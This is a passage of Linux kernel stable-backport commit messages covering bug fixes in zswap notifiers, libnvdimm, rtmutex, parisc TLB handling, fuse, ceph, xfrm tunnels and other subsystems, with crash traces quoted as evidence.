commit 777c6e0dae upstream.
Yu Zhao has noticed that __unregister_cpu_notifier only unregisters its
notifiers when HOTPLUG_CPU=y while the registration might succeed even
when HOTPLUG_CPU=n if MODULE is enabled. This means that e.g. zswap
might keep a stale notifier on the list on the manual clean up during
the pool tear down and thus corrupt the list. Resulting in the following
[ 144.964346] BUG: unable to handle kernel paging request at ffff880658a2be78
[ 144.971337] IP: [<ffffffffa290b00b>] raw_notifier_chain_register+0x1b/0x40
<snipped>
[ 145.122628] Call Trace:
[ 145.125086] [<ffffffffa28e5cf8>] __register_cpu_notifier+0x18/0x20
[ 145.131350] [<ffffffffa2a5dd73>] zswap_pool_create+0x273/0x400
[ 145.137268] [<ffffffffa2a5e0fc>] __zswap_param_set+0x1fc/0x300
[ 145.143188] [<ffffffffa2944c1d>] ? trace_hardirqs_on+0xd/0x10
[ 145.149018] [<ffffffffa2908798>] ? kernel_param_lock+0x28/0x30
[ 145.154940] [<ffffffffa2a3e8cf>] ? __might_fault+0x4f/0xa0
[ 145.160511] [<ffffffffa2a5e237>] zswap_compressor_param_set+0x17/0x20
[ 145.167035] [<ffffffffa2908d3c>] param_attr_store+0x5c/0xb0
[ 145.172694] [<ffffffffa290848d>] module_attr_store+0x1d/0x30
[ 145.178443] [<ffffffffa2b2b41f>] sysfs_kf_write+0x4f/0x70
[ 145.183925] [<ffffffffa2b2a5b9>] kernfs_fop_write+0x149/0x180
[ 145.189761] [<ffffffffa2a99248>] __vfs_write+0x18/0x40
[ 145.194982] [<ffffffffa2a9a412>] vfs_write+0xb2/0x1a0
[ 145.200122] [<ffffffffa2a9a732>] SyS_write+0x52/0xa0
[ 145.205177] [<ffffffffa2ff4d97>] entry_SYSCALL_64_fastpath+0x12/0x17
This can be even triggered manually by changing
/sys/module/zswap/parameters/compressor multiple times.
Fix this issue by making unregister APIs symmetric to the register so
there are no surprises.
Fixes: 47e627bc8c ("[PATCH] hotplug: Allow modules to use the cpu hotplug notifiers even if !CONFIG_HOTPLUG_CPU")
Reported-and-tested-by: Yu Zhao <yuzhao@google.com>
Signed-off-by: Michal Hocko <mhocko@suse.com>
Cc: linux-mm@kvack.org
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Dan Streetman <ddstreet@ieee.org>
Link: http://lkml.kernel.org/r/20161207135438.4310-1-mhocko@kernel.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c2d0f48a13 upstream.
batadv_tt_prepare_tvlv_local_data can fail to allocate the memory for the
new TVLV block. The caller is informed about this problem with the returned
length of 0. Not checking this value results in an invalid memory access
when either tt_data or tt_change is accessed.
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Fixes: 7ea7b4a142 ("batman-adv: make the TT CRC logic VLAN specific")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7e251bb21a upstream.
The current ndelay() macro definition has an extra semi-colon at the
end of the line thus leading to a compilation error when ndelay is used
in a conditional block without curly braces like this one:
if (cond)
ndelay(t);
else
...
which, after the preprocessor pass gives:
if (cond)
m68k_ndelay(t);;
else
...
thus leading to the following gcc error:
error: 'else' without a previous 'if'
Remove this extra semi-colon.
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: c8ee038bd1 ("m68k: Implement ndelay() based on the existing udelay() logic")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c3f4688a08 upstream.
This function sets req->r_locked_dir which is supposed to indicate to
ceph_fill_trace that the parent's i_rwsem is locked for write.
Unfortunately, there is no guarantee that the dir will be locked when
d_revalidate is called, so we really don't want ceph_fill_trace to do
any dcache manipulation from this context. Clear req->r_locked_dir since
it's clearly not safe to do that.
What we really want to know with d_revalidate is whether the dentry
still points to the same inode. ceph_fill_trace installs a pointer to
the inode in req->r_target_inode, so we can just compare that to
d_inode(dentry) to see if it's the same one after the lookup.
Also, since we aren't generally interested in the parent here, we can
switch to using a GETATTR to hint that to the MDS, which also means that
we only need to reserve one cap.
Finally, just remove the d_unhashed check. That's really outside the
purview of a filesystem's d_revalidate. If the thing became unhashed
while we're checking it, then that's up to the VFS to handle anyway.
Fixes: 200fd27c8f ("ceph: use lookup request to revalidate dentry")
Link: http://tracker.ceph.com/issues/18041
Reported-by: Donatas Abraitis <donatas.abraitis@gmail.com>
Signed-off-by: Jeff Layton <jlayton@redhat.com>
Reviewed-by: "Yan, Zheng" <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4b707fa00a upstream.
The eLCDIF IP of the i.MX 7 SoC knows multiple clocks and lists them
separately:
Clock Clock Root Description
apb_clk MAIN_AXI_CLK_ROOT AXI clock
pix_clk LCDIF_PIXEL_CLK_ROOT Pixel clock
ipg_clk_s MAIN_AXI_CLK_ROOT Peripheral access clock
All of them are switched by a single gate, which is part of the
IMX7D_LCDIF_PIXEL_ROOT_CLK clock. Hence using that clock also for
the AXI bus clock (clock-name "axi") makes sure the gate gets
enabled when accessing registers.
There seem to be no separate AXI display clock, and the clock is
optional. Hence remove the dummy clock.
This fixes kernel freezes when starting the X-Server (which
disables/re-enables the display controller).
Fixes: e8ed73f691 ("ARM: dts: imx7d: add lcdif support")
Signed-off-by: Stefan Agner <stefan@agner.ch>
Reviewed-by: Fabio Estevam <fabio.estevam@nxp.com>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Olof Johansson <olof@lixom.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b67d0dd7d0 upstream.
Fix for bad memory access while disconnecting. netdev is freed before
private data free, and dev is accessed after freeing netdev.
This makes a slub problem, and it raise kernel oops with slub debugger
config.
Signed-off-by: Jiho Chu <jiho.chu@samsung.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9e5f7a149e upstream.
mv_cesa_hash_std_step() copies the creq->state into the SRAM at each
step, but this is only required on the first one. By doing that, we
overwrite the engine state, and get erroneous results when the crypto
request is split in several chunks to fit in the internal SRAM.
This commit changes the function to copy the state only on the first
step.
Fixes: commit 2786cee8e5 ("crypto: marvell - Move SRAM I/O op...")
Signed-off-by: Romain Perier <romain.perier@free-electrons.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 48a992727d upstream.
Algorithms not compatible with mcryptd could be spawned by mcryptd
with a direct crypto_alloc_tfm invocation using a "mcryptd(alg)" name
construct. This causes mcryptd to crash the kernel if an arbitrary
"alg" is incompatible and not intended to be used with mcryptd. It is
an issue if AF_ALG tries to spawn mcryptd(alg) to expose it externally.
But such algorithms must be used internally and not be exposed.
We added a check to enforce that only internal algorithms are allowed
with mcryptd at the time mcryptd is spawning an algorithm.
Link: http://marc.info/?l=linux-crypto-vger&m=148063683310477&w=2
Reported-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: Tim Chen <tim.c.chen@linux.intel.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 39eaf75946 upstream.
Start with a clean slate before dealing with bit 16 (pointer size)
of Master Configuration Register.
This fixes the case of AArch64 boot loader + AArch32 kernel, when
the boot loader might set MCFGR[PS] and kernel would fail to clear it.
Reported-by: Alison Wang <alison.wang@nxp.com>
Signed-off-by: Horia Geantă <horia.geanta@nxp.com>
Reviewed-By: Alison Wang <Alison.wang@nxp.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d6eb270c57 upstream.
Given dimms and bus commands share the same command number space we need
to be careful that we are translating status in the correct context.
Otherwise we can, for example, fail an ND_CMD_GET_CONFIG_SIZE command
because max_xfer is zero. It fails because that condition erroneously
correlates with the 'cleared == 0' failure of ND_CMD_CLEAR_ERROR.
Fixes: aef2533822 ("libnvdimm, nfit: centralize command status translation")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 82aa37cf09 upstream.
If an ARS Status command returns truncated output, do not process
partial records or otherwise consume non-status fields.
Fixes: 0caeef63e6 ("libnvdimm: Add a poison list and export badblocks")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit efda1b5d87 upstream.
Given ambiguities in the ACPI 6.1 definition of the "Output (Size)"
field of the ARS (Address Range Scrub) Status command, a firmware
implementation may in practice return 0, 4, or 8 to indicate that there
is no output payload to process.
The specification states "Size of Output Buffer in bytes, including this
field.". However, 'Output Buffer' is also the name of the entire
payload, and earlier in the specification it states "Max Query ARS
Status Output Buffer Size: Maximum size of buffer (including the Status
and Extended Status fields)".
Without this fix if the BIOS happens to return 0 it causes memory
corruption as evidenced by this result from the acpi_nfit_ctl() unit
test.
ars_status00000000: 00020000 00000000 ........
BUG: stack guard page was hit at ffffc90001750000 (stack is ffffc9000174c000..ffffc9000174ffff)
kernel stack overflow (page fault): 0000 [#1] SMP DEBUG_PAGEALLOC
task: ffff8803332d2ec0 task.stack: ffffc9000174c000
RIP: 0010:[<ffffffff814cfe72>] [<ffffffff814cfe72>] __memcpy+0x12/0x20
RSP: 0018:ffffc9000174f9a8 EFLAGS: 00010246
RAX: ffffc9000174fab8 RBX: 0000000000000000 RCX: 000000001fffff56
RDX: 0000000000000000 RSI: ffff8803231f5a08 RDI: ffffc90001750000
RBP: ffffc9000174fa88 R08: ffffc9000174fab0 R09: ffff8803231f54b8
R10: 0000000000000008 R11: 0000000000000001 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000003 R15: ffff8803231f54a0
FS: 00007f3a611af640(0000) GS:ffff88033ed00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffc90001750000 CR3: 0000000325b20000 CR4: 00000000000406e0
Stack:
ffffffffa00bc60d 0000000000000008 ffffc90000000001 ffffc9000174faac
0000000000000292 ffffffffa00c24e4 ffffffffa00c2914 0000000000000000
0000000000000000 ffffffff00000003 ffff880331ae8ad0 0000000800000246
Call Trace:
[<ffffffffa00bc60d>] ? acpi_nfit_ctl+0x49d/0x750 [nfit]
[<ffffffffa01f4fe0>] nfit_test_probe+0x670/0xb1b [nfit_test]
Fixes: 747ffe11b4 ("libnvdimm, tools/testing/nvdimm: fix 'ars_status' output buffer sizing")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a901f5495 upstream.
ACPI DSMs can have an 'extended' status which can be non-zero to convey
additional information about the command. In the xlat_status routine,
where we translate the command statuses, we were returning an error for
a non-zero extended status, even if the primary status indicated success.
Return from each command's 'case' once we have verified both its status
and extend status are good.
Fixes: 11294d63ac ("nfit: fail DSMs that return non-zero status by default")
Signed-off-by: Vishal Verma <vishal.l.verma@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7f612a7f0b upstream.
Lukasz reported that perf stat counters overflow handling is broken on KNL/SLM.
Both these parts have full_width_write set, and that does indeed have
a problem. In order to deal with counter wrap, we must sample the
counter at at least half the counter period (see also the sampling
theorem) such that we can unambiguously reconstruct the count.
However commit:
069e0c3c40 ("perf/x86/intel: Support full width counting")
sets the sampling interval to the full period, not half.
Fixing that exposes another issue, in that we must not sign extend the
delta value when we shift it right; the counter cannot have
decremented after all.
With both these issues fixed, counter overflow functions correctly
again.
Reported-by: Lukasz Odzioba <lukasz.odzioba@intel.com>
Tested-by: Liang, Kan <kan.liang@intel.com>
Tested-by: Odzioba, Lukasz <lukasz.odzioba@intel.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Vince Weaver <vincent.weaver@maine.edu>
Fixes: 069e0c3c40 ("perf/x86/intel: Support full width counting")
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4587631c7 upstream.
local_addr.svm_cid is host cid. We should check guest cid instead,
which is remote_addr.svm_cid. Otherwise we end up resetting all
connections to all guests.
Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Peng Tao <bergwolf@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 83929cce95 upstream.
Michael Kerrisk reported:
> Regarding the previous paragraph... My tests indicate
> that writing *any* value to the autogroup [nice priority level]
> file causes the task group to get a lower priority.
Because autogroup didn't call the then meaningless scale_load()...
Autogroup nice level adjustment has been broken ever since load
resolution was increased for 64-bit kernels. Use scale_load() to
scale group weight.
Michael Kerrisk tested this patch to fix the problem:
> Applied and tested against 4.9-rc6 on an Intel u7 (4 cores).
> Test setup:
>
> Terminal window 1: running 40 CPU burner jobs
> Terminal window 2: running 40 CPU burner jobs
> Terminal window 1: running 1 CPU burner job
>
> Demonstrated that:
> * Writing "0" to the autogroup file for TW1 now causes no change
> to the rate at which the process on the terminal consume CPU.
> * Writing -20 to the autogroup file for TW1 caused those processes
> to get the lion's share of CPU while TW2 TW3 get a tiny amount.
> * Writing -20 to the autogroup files for TW1 and TW3 allowed the
> process on TW3 to get as much CPU as it was getting as when
> the autogroup nice values for both terminals were 0.
Reported-by: Michael Kerrisk <mtk.manpages@gmail.com>
Tested-by: Michael Kerrisk <mtk.manpages@gmail.com>
Signed-off-by: Mike Galbraith <umgwanakikbuti@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-man <linux-man@vger.kernel.org>
Link: http://lkml.kernel.org/r/1479897217.4306.6.camel@gmx.de
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2319f847a8 upstream.
The BUG_ON() recently introduced in lpfc_sli_ringtxcmpl_put() is hit in
the lpfc_els_abort() > lpfc_sli_issue_abort_iotag() >
lpfc_sli_abort_iotag_issue() function path [similar names], due to
'piocb->vport == NULL':
BUG_ON(!piocb || !piocb->vport);
This happens because lpfc_sli_abort_iotag_issue() doesn't set the
'abtsiocbp->vport' pointer -- but this is not the problem.
Previously, lpfc_sli_ringtxcmpl_put() accessed 'piocb->vport' only if
'piocb->iocb.ulpCommand' is neither CMD_ABORT_XRI_CN nor
CMD_CLOSE_XRI_CN, which are the only possible values for
lpfc_sli_abort_iotag_issue():
lpfc_sli_ringtxcmpl_put():
if ((unlikely(pring->ringno == LPFC_ELS_RING)) &&
(piocb->iocb.ulpCommand != CMD_ABORT_XRI_CN) &&
(piocb->iocb.ulpCommand != CMD_CLOSE_XRI_CN) &&
(!(piocb->vport->load_flag & FC_UNLOADING)))
lpfc_sli_abort_iotag_issue():
if (phba->link_state >= LPFC_LINK_UP)
iabt->ulpCommand = CMD_ABORT_XRI_CN;
else
iabt->ulpCommand = CMD_CLOSE_XRI_CN;
So, this function path would not have hit this possible NULL pointer
dereference before.
In order to fix this regression, move the second part of the BUG_ON()
check prior to the pointer dereference that it does check for.
For reference, this is the stack trace observed. The problem happened
because an unsolicited event was received - a PLOGI was received after
our PLOGI was issued but not yet complete, so the discovery state
machine goes on to sw-abort our PLOGI.
kernel BUG at drivers/scsi/lpfc/lpfc_sli.c:1326!
Oops: Exception in kernel mode, sig: 5 [#1]
<...>
NIP [...] lpfc_sli_ringtxcmpl_put+0x1c/0xf0 [lpfc]
LR [...] __lpfc_sli_issue_iocb_s4+0x188/0x200 [lpfc]
Call Trace:
[...] [...] __lpfc_sli_issue_iocb_s4+0xb0/0x200 [lpfc] (unreliable)
[...] [...] lpfc_sli_issue_abort_iotag+0x2b4/0x350 [lpfc]
[...] [...] lpfc_els_abort+0x1a8/0x4a0 [lpfc]
[...] [...] lpfc_rcv_plogi+0x6d4/0x700 [lpfc]
[...] [...] lpfc_rcv_plogi_plogi_issue+0xd8/0x1d0 [lpfc]
[...] [...] lpfc_disc_state_machine+0xc0/0x2b0 [lpfc]
[...] [...] lpfc_els_unsol_buffer+0xcc0/0x26c0 [lpfc]
[...] [...] lpfc_els_unsol_event+0xa8/0x220 [lpfc]
[...] [...] lpfc_complete_unsol_iocb+0xb8/0x138 [lpfc]
[...] [...] lpfc_sli4_handle_received_buffer+0x6a0/0xec0 [lpfc]
[...] [...] lpfc_sli_handle_slow_ring_event_s4+0x1c4/0x240 [lpfc]
[...] [...] lpfc_sli_handle_slow_ring_event+0x24/0x40 [lpfc]
[...] [...] lpfc_do_work+0xd88/0x1970 [lpfc]
[...] [...] kthread+0x108/0x130
[...] [...] ret_from_kernel_thread+0x5c/0xbc
<...>
Fixes: 22466da5b4 ("lpfc: Fix possible NULL pointer dereference")
Reported-by: Harsha Thyagaraja <hathyaga@in.ibm.com>
Signed-off-by: Mauricio Faria de Oliveira <mauricfo@linux.vnet.ibm.com>
Reviewed-by: Johannes Thumshirn <jthumshirn@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 325896ffdf upstream.
Hugh notes in response to commit 4cb19355ea "device-dax: fail all
private mapping attempts":
"I think that is more restrictive than you intended: haven't tried, but I
believe it rejects a PROT_READ, MAP_SHARED, O_RDONLY fd mmap, leaving no
way to mmap /dev/dax without write permission to it."
Indeed it does restrict read-only mappings, switch to checking
VM_MAYSHARE, not VM_SHARED.
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Cc: Pawel Lebioda <pawel.lebioda@intel.com>
Fixes: 4cb19355ea ("device-dax: fail all private mapping attempts")
Reported-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dbb26055de upstream.
David reported a futex/rtmutex state corruption. It's caused by the
following problem:
CPU0 CPU1 CPU2
l->owner=T1
rt_mutex_lock(l)
lock(l->wait_lock)
l->owner = T1 | HAS_WAITERS;
enqueue(T2)
boost()
unlock(l->wait_lock)
schedule()
rt_mutex_lock(l)
lock(l->wait_lock)
l->owner = T1 | HAS_WAITERS;
enqueue(T3)
boost()
unlock(l->wait_lock)
schedule()
signal(->T2) signal(->T3)
lock(l->wait_lock)
dequeue(T2)
deboost()
unlock(l->wait_lock)
lock(l->wait_lock)
dequeue(T3)
===> wait list is now empty
deboost()
unlock(l->wait_lock)
lock(l->wait_lock)
fixup_rt_mutex_waiters()
if (wait_list_empty(l)) {
owner = l->owner & ~HAS_WAITERS;
l->owner = owner
==> l->owner = T1
}
lock(l->wait_lock)
rt_mutex_unlock(l) fixup_rt_mutex_waiters()
if (wait_list_empty(l)) {
owner = l->owner & ~HAS_WAITERS;
cmpxchg(l->owner, T1, NULL)
===> Success (l->owner = NULL)
l->owner = owner
==> l->owner = T1
}
That means the problem is caused by fixup_rt_mutex_waiters() which does the
RMW to clear the waiters bit unconditionally when there are no waiters in
the rtmutexes rbtree.
This can be fatal: A concurrent unlock can release the rtmutex in the
fastpath because the waiters bit is not set. If the cmpxchg() gets in the
middle of the RMW operation then the previous owner, which just unlocked
the rtmutex is set as the owner again when the write takes place after the
successfull cmpxchg().
The solution is rather trivial: verify that the owner member of the rtmutex
has the waiters bit set before clearing it. This does not require a
cmpxchg() or other atomic operations because the waiters bit can only be
set and cleared with the rtmutex wait_lock held. It's also safe against the
fast path unlock attempt. The unlock attempt via cmpxchg() will either see
the bit set and take the slowpath or see the bit cleared and release it
atomically in the fastpath.
It's remarkable that the test program provided by David triggers on ARM64
and MIPS64 really quick, but it refuses to reproduce on x86-64, while the
problem exists there as well. That refusal might explain that this got not
discovered earlier despite the bug existing from day one of the rtmutex
implementation more than 10 years ago.
Thanks to David for meticulously instrumenting the code and providing the
information which allowed to decode this subtle problem.
Reported-by: David Daney <ddaney@caviumnetworks.com>
Tested-by: David Daney <david.daney@cavium.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Steven Rostedt <rostedt@goodmis.org>
Acked-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Mark Rutland <mark.rutland@arm.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Sebastian Siewior <bigeasy@linutronix.de>
Cc: Will Deacon <will.deacon@arm.com>
Fixes: 23f78d4a03 ("[PATCH] pi-futex: rt mutex core")
Link: http://lkml.kernel.org/r/20161130210030.351136722@linutronix.de
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 24d0492b7d upstream.
At bootup we run measurements to calculate the best threshold for when we
should be using full TLB flushes instead of just flushing a specific amount of
TLB entries. This performance test is run over the kernel text segment.
But running this TLB performance test on the kernel text segment turned out to
crash some SMP machines when the kernel text pages were mapped as huge pages.
To avoid those crashes this patch simply skips this test on some SMP machines
and calculates an optimal threshold based on the maximum number of available
TLB entries and number of online CPUs.
On a technical side, this seems to happen:
The TLB measurement code uses flush_tlb_kernel_range() to flush specific TLB
entries with a page size of 4k (pdtlb 0(sr1,addr)). On UP systems this purge
instruction seems to work without problems even if the pages were mapped as
huge pages. But on SMP systems the TLB purge instruction is broadcasted to
other CPUs. Those CPUs then crash the machine because the page size is not as
expected. C8000 machines with PA8800/PA8900 CPUs were not affected by this
problem, because the required cache coherency prohibits to use huge pages at
all. Sadly I didn't found any documentation about this behaviour, so this
finding is purely based on testing with phyiscal SMP machines (A500-44 and
J5000, both were 2-way boxes).
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit febe42964f upstream.
We have four routines in pacache.S that use temporary alias pages:
copy_user_page_asm(), clear_user_page_asm(), flush_dcache_page_asm() and
flush_icache_page_asm(). copy_user_page_asm() and clear_user_page_asm()
don't purge the TLB entry used for the operation.
flush_dcache_page_asm() and flush_icache_page_asm do purge the entry.
Presumably, this was thought to optimize TLB use. However, the
operation is quite heavy weight on PA 1.X processors as we need to take
the TLB lock and a TLB broadcast is sent to all processors.
This patch removes the purges from flush_dcache_page_asm() and
flush_icache_page_asm.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c78e710c1c upstream.
The attached change interchanges the order of purging the TLB and
setting the corresponding page table entry. TLB purges are strongly
ordered. It occurred to me one night that setting the PTE first might
have subtle ordering issues on SMP machines and cause random memory
corruption.
A TLB lock guards the insertion of user TLB entries. So after the TLB
is purged, a new entry can't be inserted until the lock is released.
This ensures that the new PTE value is used when the lock is released.
Since making this change, no random segmentation faults have been
observed on the Debian hppa buildd servers.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c01638f5d9 upstream.
Basically, the pjdfstests set the ownership of a file to 06555, and then
chowns it (as root) to a new uid/gid. Prior to commit a09f99edde ("fuse:
fix killing s[ug]id in setattr"), fuse would send down a setattr with both
the uid/gid change and a new mode. Now, it just sends down the uid/gid
change.
Technically this is NOTABUG, since POSIX doesn't _require_ that we clear
these bits for a privileged process, but Linux (wisely) has done that and I
think we don't want to change that behavior here.
This is caused by the use of should_remove_suid(), which will always return
0 when the process has CAP_FSETID.
In fact we really don't need to be calling should_remove_suid() at all,
since we've already been indicated that we should remove the suid, we just
don't want to use a (very) stale mode for that.
This patch should fix the above as well as simplify the logic.
Reported-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: a09f99edde ("fuse: fix killing s[ug]id in setattr")
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dd7b2f035e upstream.
On 64-bit CPUs with no-execute support and non-snooping icache, such as
970 or POWER4, we have a software mechanism to ensure coherency of the
cache (using exec faults when needed).
This was broken due to a logic error when the code was rewritten
from assembly to C, previously the assembly code did:
BEGIN_FTR_SECTION
mr r4,r30
mr r5,r7
bl hash_page_do_lazy_icache
END_FTR_SECTION(CPU_FTR_NOEXECUTE|CPU_FTR_COHERENT_ICACHE, CPU_FTR_NOEXECUTE)
Which tests that:
(cpu_features & (NOEXECUTE | COHERENT_ICACHE)) == NOEXECUTE
Which says that the current cpu does have NOEXECUTE, but does not have
COHERENT_ICACHE.
Fixes: 91f1da9979 ("powerpc/mm: Convert 4k hash insert to C")
Fixes: 89ff725051 ("powerpc/mm: Convert __hash_page_64K to C")
Fixes: a43c0eb836 ("powerpc/mm: Convert 4k insert from asm to C")
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
[mpe: Change log verbosification]
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 409bf7f8a0 upstream.
In eeh_reset_device(), we take the pci_rescan_remove_lock immediately after
after we call eeh_reset_pe() to reset the PCI controller. We then call
eeh_clear_pe_frozen_state(), which can return an error. In this case, we
bail out of eeh_reset_device() without calling pci_unlock_rescan_remove().
Add a call to pci_unlock_rescan_remove() in the eeh_clear_pe_frozen_state()
error path so that we don't cause a deadlock later on.
Reported-by: Pradipta Ghosh <pradghos@in.ibm.com>
Fixes: 7895470063 ("powerpc/eeh: Avoid I/O access during PE reset")
Signed-off-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Acked-by: Russell Currey <ruscur@russell.cc>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b22648781 upstream.
The threshold for OOM protection is too small for systems with large
number of CPUs. Applications report ENOBUFs on connect() every 10
minutes.
The problem is that the variable net->xfrm.flow_cache_gc_count is a
global counter while the variable fc->high_watermark is a per-CPU
constant. Take the number of CPUs into account as well.
Fixes: 6ad3122a08 ("flowcache: Avoid OOM condition under preasure")
Reported-by: Lukáš Koldrt <lk@excello.cz>
Tested-by: Jan Hejl <jh@excello.cz>
Signed-off-by: Miroslav Urbanek <mu@miroslavurbanek.com>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 80d1106aea upstream.
This reverts commit ae148b0858
("ip6_tunnel: Update skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit()").
skb->protocol is now set in __ip_local_out() and __ip6_local_out() before
dst_output() is called. It is no longer necessary to do it for each tunnel.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f418043910 upstream.
When xfrm is applied to TSO/GSO packets, it follows this path:
xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
where skb_gso_segment() relies on skb->protocol to function properly.
This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b4e479a96f upstream.
When xfrm is applied to TSO/GSO packets, it follows this path:
xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
where skb_gso_segment() relies on skb->protocol to function properly.
This patch sets skb->protocol to ETH_P_IPV6 before dst_output() is called,
fixing a bug where GSO packets sent through an ipip6 tunnel are dropped
when xfrm is involved.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 87a349f9cc ]
A compile warning is introduced by a commit to fix the find_node().
This patch fix the compile warning by moving find_node() into __init
section. Because find_node() is only used by memblock_nid_range() which
is only used by a __init add_node_ranges(). find_node() and
memblock_nid_range() should also be inside __init section.
Signed-off-by: Thomas Tai <thomas.tai@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 74a5ed5c4f ]
When booting up LDOM, find_node() warns that a physical address
doesn't match a NUMA node.
WARNING: CPU: 0 PID: 0 at arch/sparc/mm/init_64.c:835
find_node+0xf4/0x120 find_node: A physical address doesn't
match a NUMA node rule. Some physical memory will be
